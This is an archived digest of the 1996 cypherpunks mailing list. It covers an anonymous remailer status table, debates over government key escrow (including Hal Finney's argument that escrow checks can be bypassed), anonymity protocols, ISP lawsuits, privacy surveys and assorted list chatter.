$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash latent cut ek mix reord";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)
(weasel squirrel)

The winsock remailer does not accept plaintext messages.

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver. The nym.alias.net server will be listed
soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

Last update: Mon 14 Oct 96 6:47:45 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
jam      remailer@cypherpunks.ca          *--**+**-***    34:04  99.98%
dustbin  dustman@athensnet.com            ++--+++--+++  1:45:22  99.97%
cyber    alias@alias.cyberpass.net         -*-++++-*+*    56:03  99.92%
haystack haystack@holy.cow.net            ** ###-+-*##    23:32  99.88%
exon     remailer@remailer.nl.com         *###**# -###    20:05  99.76%
mix      mixmaster@remail.obscura.com     ++++++---+++  3:26:12  99.74%
amnesia  amnesia@chardos.connix.com       -----------   4:19:40  99.69%
squirrel mix@squirrel.owl.de              +--------+++  2:39:05  99.55%
lead     mix@zifi.genetics.utah.edu       +---++++-+++  1:06:16  99.44%
extropia remail@miron.vip.best.com        ---_. -----  10:55:12  97.50%
balls    remailer@huge.cajones.com        *-****** ***    21:59  96.47%
middle   middleman@jpunix.com             - ----  . -   4:47:12  94.79%
replay   remailer@replay.com                ****++- *     26:40  93.91%
winsock  winsock@c2.org                   -+++------    3:00:33  78.61%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 14 Oct 1996 04:59:19 -0700 (PDT)
To: roy@scytale.com
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <961011.070615.2E8.rnr.w165w@sendai.scytale.com>
Message-ID: <Pine.SUN.3.94.961014075619.7731B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 11 Oct 1996, Roy M. Silvernail wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In list.cypherpunks, svmcguir@syr.edu writes:
> 
> > roy@scytale.com said 
> 
> [re: my debit card]
> 
> >> I have one of those, too.  A couple of months ago, Thrifty car rental
> >> refused to accept it to rent a car.  (the agent was pretty snotty about
> >> it, too)  Beginning of a trend?
> >
> > Did he recognize that it wasn't a "real" card himself?  I find that many
> > cashiers don't know what it is.  If you just say its a Visa (or MC etc.)
> > they'll use it.  It works just like a real card when they swipe it.
> 
> She recognized it, alright.  Of course, it says "NORWEST Instant Cash
> and Check" in brilliant yellow letters.
> 
> The exchange was like this:
> 
> Me:     offers debit card
> 
> Her:    "That's a check cashing card."
> 
> Me:     "No, it is _not_ a 'check cashing card'."
> 
> Her:    "Well, it's a debit card.  We don't accept those."
> 
> No sign, no warning.  If I hadn't been on a tight business schedule, I'd
> have walked out.

Any idea what the basis for refusing "debit" cards is?

I've heard that one concern is that debit cards will often not hold a high
enough balance to be used as a security deposit.
How this applies in terms of rental cars is a bit beyond me.


> - -- 
>            Roy M. Silvernail     [ ]      roy@scytale.com
> DNRC Minister Plenipotentiary of All Things Confusing, Software Division
> PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
>                 Key available from pubkey@scytale.com
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMl45ZRvikii9febJAQH4cAP/X7sjlk2W4ys9VKxwDfb70cQRSoWp0NYX
> JWz8b1Od625DN4sVQI6t8eHRPfns696Ac/MeYWT0YvAHAXeK6VoLr+/S7xCGBeAp
> G8RjU0VJGzLtHYVgXme+ouM+ksMWj76fwCsy6KyQT5sKtnlCWY81wqnjcS+RxWMa
> bFOhNTLRm4o=
> =venZ
> -----END PGP SIGNATURE-----
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 14 Oct 1996 05:17:23 -0700 (PDT)
To: everheul@mail.rijnhaave.nl
Subject: RE: RE: Binding cryptography - a fraud-detectible alternative to
In-Reply-To: <199610131050.LAA28296@mail.rijnhaave.nl>
Message-ID: <Pine.SUN.3.94.961014080600.7731C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 13 Oct 1996 everheul@mail.rijnhaave.nl wrote:

> Of course, people are rightfully worried that such a checkable system
> might be abused by a totalitarian regime to control their citizens.
> However, as long as such a system is voluntary I see no problem. Signs
> in the USA indicate (cf. the NRC study & remarks of the president)
> that use of other systems will always be possible.

I believe this paragraph is alone absolute proof that forums which
permit only discussion of technical details, and not the politics thereof,
are counterproductive.

The author above has so little concept of the nature of the American
Political system, and indeed the political systems which will seek to
regulate cryptography in democratic governments all over the world, as to
be outright dangerous.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 14 Oct 1996 09:20:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
Message-ID: <v02130501ae87b6508442@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>>> >Steve Shear <azur@netcom.com> writes:
>>> I've been charged with developing an Internet service which needs to assure
>>> its clients of anonymity.  However, we fear some clients may abuse the
>>> service and we wish to prevent the abusers from re-enrollment if
>>> terminated for misbehavior.
>
>At 04:28 PM 10/13/96 -0400, "Michael Froomkin - U.Miami School of Law"
><froomkin@law.miami.edu> wrote:
>>Stefan Brands has a protocol that probably does what you want.
>....
>>http://www.law.miami.edu/~froomkin/articles/oceanno.htm#ENDNOTE286
>
>Looks like a really nice paper on anonymity issues; at 485K, it'll take
>a little while to read :-)

Yes, it was quite a load, but very good material.

>
>The fundamental difficulty in this problem is that you need some
>demonstrable proof of uniqueness for human users; if you don't have that,
>you can't transform it into a unique-but-anonymous identity.*
>The issues are similar to privacy-protecting voter registration problems.
>
>Brands's protocol starts with the user going to the bank with proof of ID,
>and getting a numerical ID which can be blinded and signed.
>It's a nice approach; you can do cruder approaches by hashing your
>universal-citizen-unit-ID-number or whatever, but that can be
>dictionary-searched
>by feeding all the possible ID numbers through the hash.
>
>For some applications, mapping back to a unique human isn't necessary;
>if you do something like map back to a bank account which has a high
>minimum balance for setup, this discourages the type of users who
>don't want to spend $100 just to send spam.
>
>Blinding a Verisign signature isn't enough, though - they support
>personna certificates without proof of identity.

Is it possible to determine the level of Verisign signature to screen out
personna certificates?

>
>[ * There are non-universal-identifier methods for preventing double-use.
>Voter registration in many places just depends on identification and
>affidavit, and is often abused (e.g. Chicago graveyard voters and
>Nevada absentee ballots), but usually not massively abused.
>Some third-world countries don't even require registration or literacy -
>they dip your thumb in ink after you vote, using a kind of ink that
>won't come off for a couple of days.  Attacks against this protocol
>include better solvents :-) ]

Of course, if elections were very infrequent, they could cut off a finger
each time you vote :-)

You all have given me much to think about.

Thanks.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 14 Oct 1996 09:23:07 -0700 (PDT)
To: John Young <cypherpunks@toad.com
Subject: Re: FLY_not
Message-ID: <199610141622.JAA06348@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:30 AM 10/14/96 -0400, John Young wrote:
>   10-13-96. CoWo:
>
>   "Encryption confusion"
>
>      Reminded of the secret Clipper algorithm, I sought
>      details from IBM. I asked a spokeswoman why the company
>      hadn't just put out a nice, snappy white paper
>      explaining its new approach to key recovery. "We spent
>      three months trying to do that, quite literally," the
>      spokeswoman said. "It's pretty confusing stuff, and
>      whenever we get it on paper, we aren't happy with it."


That's interesting...whenever they get it on paper, _we_ aren't happy with 
it either!

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 14 Oct 1996 06:50:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: L.Detwieler
In-Reply-To: <1.5.4.32.19961014013918.0071c920@mail.earthlink.net>
Message-ID: <95isVD51w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Tom Lojewski <lojewski@switzerland-c.it.earthlink.net> writes:

> How do I get off this list?

If you don't want to receive inane rants in your mailbox which have
nothing to do with cryptography, send the word "remove" (no quotes)
to tcmay@got.net.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 14 Oct 1996 06:32:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FLY_not
Message-ID: <1.5.4.16.19961014133038.350f81cc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-13-96. CoWo:

   "Encryption confusion"

      Reminded of the secret Clipper algorithm, I sought
      details from IBM. I asked a spokeswoman why the company
      hadn't just put out a nice, snappy white paper
      explaining its new approach to key recovery. "We spent
      three months trying to do that, quite literally," the
      spokeswoman said. "It's pretty confusing stuff, and
      whenever we get it on paper, we aren't happy with it."

   10-12-96. InWe:

   "IBM Coalition May Not Fly" [Thanks, WR]

      "The relaxation on encryption is in many ways an
      extortion of industry," said Bob Gargus, president of
      the Atalla. "If this starts to happen for export, how
      many companies will be able to support two standards? I
      think every American should be worried." But Greg Simon,
      domestic policy adviser to Vice President Al Gore, said,
      "We're not looking for an answer that's universally
      popular. We're looking for a solution that's balanced
      and fair."

   10-11-96. RDSN:

   "Bellcore Theory Affects Security"

      "Future applications, some theorize, that work on smart
      cards might work on your Pentium PC," says William Barr.
      Most smart cards use private key encryption, such as DES
      and RSA, making it all the more unlikely that Bellcore's
      theory would work on smart cards. However, the threat
      still should be investigated because the intention
      eventually is to use public key encryption for wireless
      communications and identification validation.

   "ABA: Banks Should Issue Cards"

      Only deposit institutions should issue smart cards, says
      the American Bankers Association.

   -----

   http://jya.com/flynot.txt

   ftp://jya.com/pub/incoming/flynot.txt

   FLY_not












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 14 Oct 1996 22:11:30 -0700 (PDT)
To: everheul@mail.rijnhaave.nl
Subject: Re: binding cryptography
Message-ID: <199610150510.WAA04937@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:53 PM 10/14/96 +0200, Ulf Moeller wrote:
> So governments can wiretap
> law-abiding citizens, but not criminals. What use is a system like
> that?

For the government, very useful indeed.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Mon, 14 Oct 1996 07:31:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: SPA sues C2, other ISPs and users
In-Reply-To: <199610130045.UAA03900@myriad>
Message-ID: <Pine.BSI.3.91.961014093111.3583A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 12 Oct 1996, Matthew Ghio wrote:

> A few months ago I saw Sameer grumbling about people "not paying for
> Apache-SSL".  Now SPA claims he's operating an ISP to promote piracy.  So
> first he's a software publisher and now he's a software pirate.  Uh, yeah,
> whatever.  Obviously SPA is on a PR campaign here which defies all
> conventional logic.

    More likely is that he wouldn't pay them $10,000 to "protect" his own 
software interests and they decided to make him an example..

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      "We don't want to get our butts kicked by a bunch of long-haired 
        26-year-olds with earrings." -- General John Sheehan on their 
                       reasons for InfoWar involvement





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 14 Oct 1996 07:46:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Anatomy of a Hoax
In-Reply-To: <3260422F.115654B7@slonet.org>
Message-ID: <73LsVD56w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Path: perun!news2.panix.com!panix!feed1.news.erols.com!howland.erols.net!news.sprintlink.net!news-peer.sprintlink.net!uunet!news-in2.uu.net!news.callamer.com!news@twizzler.callamer.com
From: "Brian G. Hughes" <bhughes@slonet.org>
Newsgroups: alt.shenanigans
Subject: Anatomy of a Hoax
Message-ID: <3260422F.115654B7@slonet.org>
Date: Sat, 12 Oct 1996 18:13:19 -0700
Organization: Call America Internet Services  +1 (805) 541 6316
Lines: 47
NNTP-Posting-Host: boobs.eorbit.net
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

The press release went out in mid-week.  "Arm the Homeless
	to Donate Firearms, Training to S.L.O Homeless Community."

	Modeled after a similar ATH hoax done a few years back by
	some OSU students in Columbus, Ohio, this version had the
	press jumping.

	"[F]or someone in the underclass, a firearm works as 'the
	great equalizer,'" the press-release read.  "[A] homeless
	person with a gun is just as powerful as his wealthy or
	politically powerful counterpart..."

	The answering machine I set up to take ATH calls was soon
	swamped with interview requests from the local newspaper
	and newsweekly and the local television station.

	I wrote up a bulletin and schedule of events for our
	fictitious organization, including fund-raising rallies,
	interviews with homeless folks, and weapons training.

	I then called some friends and enlisted their help.

	Early the next week, we arranged to fake an officers meeting
	to discuss our interviews with homeless folks and decide
	which ones to donate guns to.  We then invited the press.

	The first to show was the K--- camera crew.  Shortly after
	they arrived, a confederate dressed somewhat bum-like showed
	up, rolling a shopping cart full of junk.  One of the items
	was three firearms wrapped in a ragged blanket.  The camera
	crew went nuts, and our confederate explained that he'd
	managed to pick these up on the cheap and they only had to
	be doctored a little.

	The newspaper and newsweekly reporters showed up next.  Even
	though the newspaper reporter had found out about the
	Columbus hoax on the web, the reporters stuck around and
	covered our meeting.  They so much /wanted/ to believe this
	great story that they were willing to buy any story I gave
	them.

	We were the top story at six and the number two story at
	eleven.

	Alas, the police got interested, and we didn't really want
	to get them upset (you wouldn't like him when he's angry),
	so we fessed up.  But it was good while it lasted.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 14 Oct 1996 07:48:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: fwd: Privacy on the Internet
Message-ID: <v03007858ae8802722195@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: oldbear@tiac.net
Mime-Version: 1.0
Date: Mon, 14 Oct 1996 08:48:23 -0300
To: dcsb@ai.mit.edu (Digital Commerce Society of Boston)
From: The Old Bear <oldbear@arctos.com>
Subject: fwd: Privacy on the Internet
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: The Old Bear <oldbear@arctos.com>

INTERNET USERS VALUE THEIR PRIVACY

The 1996 Equifax/Harris Consumer Privacy Survey for the Internet
reveals that Internet users place a high premium on their online
privacy, relative to non-Internet users.  Sixty percent of the
Internet users interviewed said their anonymity shouldn't be
compromised when they visit a Web site or use e-mail.  Only 45%
of non-Internet users were sympathetic to the desire for online
anonymity.

About half (49%) of the Internet users who participated felt that
the federal government should be restricted in its ability to
scan Internet messages, compared to only a third (34%) of
non-users.

Seventy-one percent of Internet users did not want online service
providers to track their Web surfing patterns for marketing
purposes, while 63% of non-users felt this activity was intrusive.

The telephone survey of 36 million people also found that Internet
users tended on average to be better educated, earn more money and
have a somewhat more liberal outlook than non-users.

source: BNA Daily Report for Executives
        October 10, 1996 - page A24



CONSORTIUM TO DEVELOP NET PRIVACY PRINCIPLES

A group of companies involved in electronic commerce via the
Internet have banded together to develop a set of privacy principles
for doing business over the Net.

The Privacy Assured group includes WorldPages, Inc., Four11, I/PRO,
Match.Com and NetAngels.Com, and was sparked by recent reports of
database services such as Nexis/Lexis providing sensitive
information to paying customers.

Privacy Assured, which is a pilot program of the Electronic Frontier
Foundation's eTrust project, will post its blue PA logo on Web sites
that adhere to its standards.  These standards include: not knowingly
listing information about individuals that has not been volunteered
for publication; not allowing reverse searches to determine
individuals' names from e-mail addresses, phone numbers or other
information; releasing only aggregated usage statistics, not
individual information; and giving individuals the option to delete
personal information from lists.

source: Broadcasting & Cable
        October 7, 1996
        page 87


via edupage

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.net
Date: Mon, 14 Oct 1996 11:19:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION SUED IN FRIVOLOUS LAWSUIT
Message-ID: <199610141819.LAA28460@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	    COMMUNITY CONNEXION SUED IN FRIVOLOUS LAWSUIT

For release: October 14, 1996
Contact: Sameer Parekh 510-986-8770

Oakland, CA - Community ConneXion, Inc, dba C2Net, condemns the
lawsuit served by Adobe Systems, Inc., Claris Corporation, and
Traveling Software, Inc. as a frivolous lawsuit. "As near as we can
tell," said C2Net President Sameer Parekh, "we are being sued for
being an Internet Service Provider." 

C2Net is an ISP, providing shell accounts and web hosting
services. But the company is primarily a software vendor, selling
Stronghold, one of the most popular secure web servers on the
market. "We were looking into joining the Software Publisher's
Association, who filed the suit on behalf of the plaintiffs," said
Parekh, "but it's not very likely to happen at this point."

The lawsuit appears to charge C2Net with liability based upon
allegations that C2Net's customers provide links to pirated software
on other machines and "cracker tools" that allow users to beat
copy-protection mechanisms like software serial numbers.

"It's completely outrageous that the SPA has nothing better to do
than to file frivolous lawsuits against hard-working Internet Service
Providers," said Parekh. "We are not aware of any such links on our
pages or our customer's pages, and if our customers are breaking any
laws, we want to know about it so we can terminate their accounts."
(The lawsuit provides no specific examples.) 

The lawsuit was apparently filed after a single attempt to contact the
company with a form-letter e-mail. The copy of the alleged e-mail
included as an attachment to the suit shows the SPA's real
motive. "They want us to sign a 'Code of Conduct'," said
Parekh. "Among other things, we'd have to agree to routinely monitor
our customer's web pages, which we won't do. We deal with complaints
about our customers on a case by case basis, and we have a firm and
clear policy against illegal activity of any sort. We've shut down
accounts for less than what they're alleging in this lawsuit."

"This is clearly a frivolous lawsuit," said Terry Gross, counsel for
C2Net. "The plaintiffs know that an ISP can only be liable if it 
participates in and has knowledge of the improper activity, and it is 
clear that they have no such basis."

Although the lawsuit does not mention the "Code of Conduct", it
appears that most ISPs who received the e-mail ended up signing it,
largely to avoid legal action from the much-feared SPA. Those that
didn't kowtow got sued.

"The terms of the 'Code of Conduct' are completely unacceptable," said
Parekh. "It basically gives the SPA the right to go on an ongoing
fishing expedition through our customer's files, and requires us to do
the same as their agent on a regular basis.  The Code would classify
us as 'publishers', and we would become responsible for everything our
customers do. We've built this business on a solid foundation of
respect for our customer's privacy. Monitoring their activities
without grounds for suspicion is completely inconsistent with
maintaining their privacy."

"This lawsuit is grossly unfair, and it's going to cost us a lot of
time and money, but we don't have any choice but to fight it," said
Parekh. "What we have here is three giant software companies and their
well-funded bag of lawyers trying to bully a smaller software company
into adopting costly policies that invade customers' privacy."

A coalition is currently being formed to fight this case and make sure
that this form of legal terrorism does not occur in the future against
internet providers. The coalition will probably include the three companies
that have been served in the suit and other organizations with a stake
in creating a rational legal enviroment for ISPs and their customers.

C2Net provides high-security encryption solutions for the Internet
worldwide.  More information about C2Net's products are available at
https://stronghold.c2.net/. Information about the forming coalition
may be found at https://www.c2.net/ispdc/.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Mon, 14 Oct 1996 11:37:48 -0700 (PDT)
To: everheul@mail.rijnhaave.nl
Subject: RE: RE: Binding cryptography - a fraud-detectible alternative to
Message-ID: <199610141822.LAA06792@crypt>
MIME-Version: 1.0
Content-Type: text/plain


From: everheul@mail.rijnhaave.nl
> Hal Finney[SMTP:hal@rain.org] wrote:
> >Another flaw with schemes of this time (in terms of failing to meet
> >their goals) is that they cannot detect superencryption and other
> >forms of non-standard encryption of the message body proper.  All
> >they can really do is verify from the outside that the same session
> >key is encrypted for the two recipients (the intended recipient and
> >the Government Access to Keys Party - let's not abuse the term by
> >calling him a Trusted Third Party).  But they can't be sure that the
> >session key is sufficient information to decrypt the message.
> We offered a solution for the *first* task not for the *second*; the
> point is that criminals(!) do not gain any real advantage from using
> the system in that way as they - among other things - still face the
> key-management problem. The above dicussions are only relevant in
> countries where the use of crypto outside the structure would be
> prohibited. BTW, it is by such discussions that I believe such a ban
> is ineffective and in fact counterproductive.

I have not read your paper, but let me illustrate via what may be
a similar scheme how criminals can use the key management infrastructure,
create messages which look good from outside, yet which still cannot
be read by the GAK (government access to keys) people.

In ElGamal encryption we start with a message session key M which we
want to send across.  We have the public key y1 = g^x1 of the recipient
(^ is exponentiation).  We choose a random blinding factor xm, and
calculate ym = g^xm.  We send ym and M * (y1^xm).  y1^xm equals
g^(x1*xm), and the recipient can recover this by ym^x1.

Now with two recipients, if we choose the same blinding factor xm for
both, we send ym = g^xm, and both M * (y1^xm) and M * (y2^xm).  We use the
two different recipients' public keys y1 and y2.  I believe this can be
checked from outside by taking the ratios of these two factors (y1/y2)^xm
and using known methods to prove that this is of the proper form.

This can be circumvented though simply by replacing M, the true session
key, with M' = M*(y1^xm), where y1 is the intended recipient (and y2 is
the GAK party).  We send M'*(y1^xm) and M'*(y2^xm).  Outsiders still
verify that this is of the proper form.  And the intended recipient
can calculate the true M by dividing twice by y1^xm instead of once
(in effect M' is the El Gamal encryption of M for party 1).  But the GAK
party, who gets M'*(y2^xm) and recovers M', finds it useless in trying
to decrypt the message.

This shows how keys from a standard infrastructure can be used in a
slightly non-standard way to confound your scheme.  Granted, the parties
involved have to share knowledge about using the keys in this non-
standard way, but that is only one bit of information and not at all
hard to distribute.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 14 Oct 1996 11:27:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Fuck Cyberpromo
In-Reply-To: <v03007801ae85b0546a74@[206.119.69.46]>
Message-ID: <v03007800ae88444f9194@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




>I'm already doing that.  I began with the very first one I received, and
>instructed him to block all mail to my two domains.  After 3, I began
>invoicing Mr. Wallace $25 per message.  His bill is up to $100 right
>now.  I expect it will go higher (although the snail mail copy _might_
>get more attention than the email).
>
>Anyone on the list know of a good, heavy-handed collection agency that
>would like to take this when it tops, say, $500?

What contract do you have with savetrees.com that allows you to invoice
them? Do you have a Purchase Order number?

While I certainly am equally annoyed with their crap, I am also annoyed by
all sorts of "unwanted mail" I receive. Including unwanted _physical_ mail.

The "junk fax" law was carefully crafted to cover only continuing,
persistent, and extensive abuse of fax machines....and I'm not even sure it
would stand up in court (lawyers may have a clearer idea). Certainly it is
essentially impossible for me to, upon receiving a fax I "did not ask for,"
to successfully collect on an invoice for, say, $100 (my "fee"). I would
guess, from what I've read about the "junk fax" law, that it might be
useful in a case of persistent, extensive "fax bombing." But probably
useless for small, intermittent messages.

And it is not written to cover e-mail, of course.

Also, there's the risk of a _countersuit_ if an "official-looking" invoice
is sent to a company. Why? Turns out that a scam that is spreading is the
invoicing of companies for supplies and services never actually
provided....many companies are so chaotic and disorganized that they'll pay
invoices submitted to them. When they eventually determine they were paying
for such invoices, they often take the matter to the local fraud folks.

Until "junk e-mail" laws are passed (not that I support them, by the way),
not much can be done.

A precedent-setting case would of course cost a lot of money to follow
through on.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 14 Oct 1996 09:49:18 -0700 (PDT)
To: Tom Lojewski <lojewski@switzerland-c.it.earthlink.net>
Subject: [NOISE] Re: Clinternet?
In-Reply-To: <1.5.4.32.19961014012929.0071c86c@mail.earthlink.net>
Message-ID: <Pine.BSF.3.91.961014112431.23550D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




It's just a joke. Delete before reading.

On Sun, 13 Oct 1996, Tom Lojewski wrote:

> 
> How do I get off this list?
> 

First, reply to every message posted to the list, asking "How do I get 
off this list"? 1500 people will get each and every message, and if all 
of them respond, maybe the incomming mail will fill up the com-pute-er at 
your place, until little ones and zeros run out all over the floor. Your 
system administrator (god, to you, mortal) will then delete your account, 
solving your problem. If this doesn't happen, go to the place where they 
keep your comp-ute-erz and open the door. This make take some force, as 
the system administrators (gods, to you, mortal) do not like you playing 
with their toyz. Find the mail server. If you don't know which one is the 
mail server, don't despair; just start with the biggest thing with the 
most blinkin' lights and work your way towards the smallest. Take off the 
coverz of all of da mail serverz, and find the cypherpunks wire. It is 
probably one of the red ones, or maybe black, or something. Use a pair of 
wire cutters to cut the cypherpunks wires, and all wirez that look like 
they might be cypherpunks wirez. Be sure to leave your wristwatch inside 
one of the mailserverz when finished. All good system 
administratorz (godz, to you, mortal) do this when dey werks on da 
mailserverz. When you are finished, stand under the smoke detector and 
light up a smoke. Wait for the halon system to discharge. You will not be 
bothered by any more cypherpunks mail.  :)

OR, you could just send a message to majordomo@toad.com,

with the following in the BODY, not the SUBJECT:

unsubscribe cypherpunks lojewski@switzerland-c.it.earthlink.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Mon, 14 Oct 1996 12:59:13 -0700 (PDT)
To: camcc@abraxis.com
Subject: Re: [Noise] Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <2.2.32.19961009171834.0068ebb4@smtp1.abraxis.com>
Message-ID: <Pine.3.89.9610141144.A6467-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 9 Oct 1996 camcc@abraxis.com wrote:

> At 01:04 AM 10/9/96 -0700, you [Paul S. Penrod] wrote:
> :
> 
> :I suggest you [Alan Olsen] RTFM again. It was a commentary on the sad state of 
> :scientific practice as germain to today's egomanical pirannah who inhabit 
> :the domain of the "scientist". To publish is to exist, and the first rule 
> :is "draw your curves, then plot your points." The second is "Thou shalt 
> :not critisize your mentor."
> :
> :Save the anti-religion rhetoric for someone who gives a damn.
> :
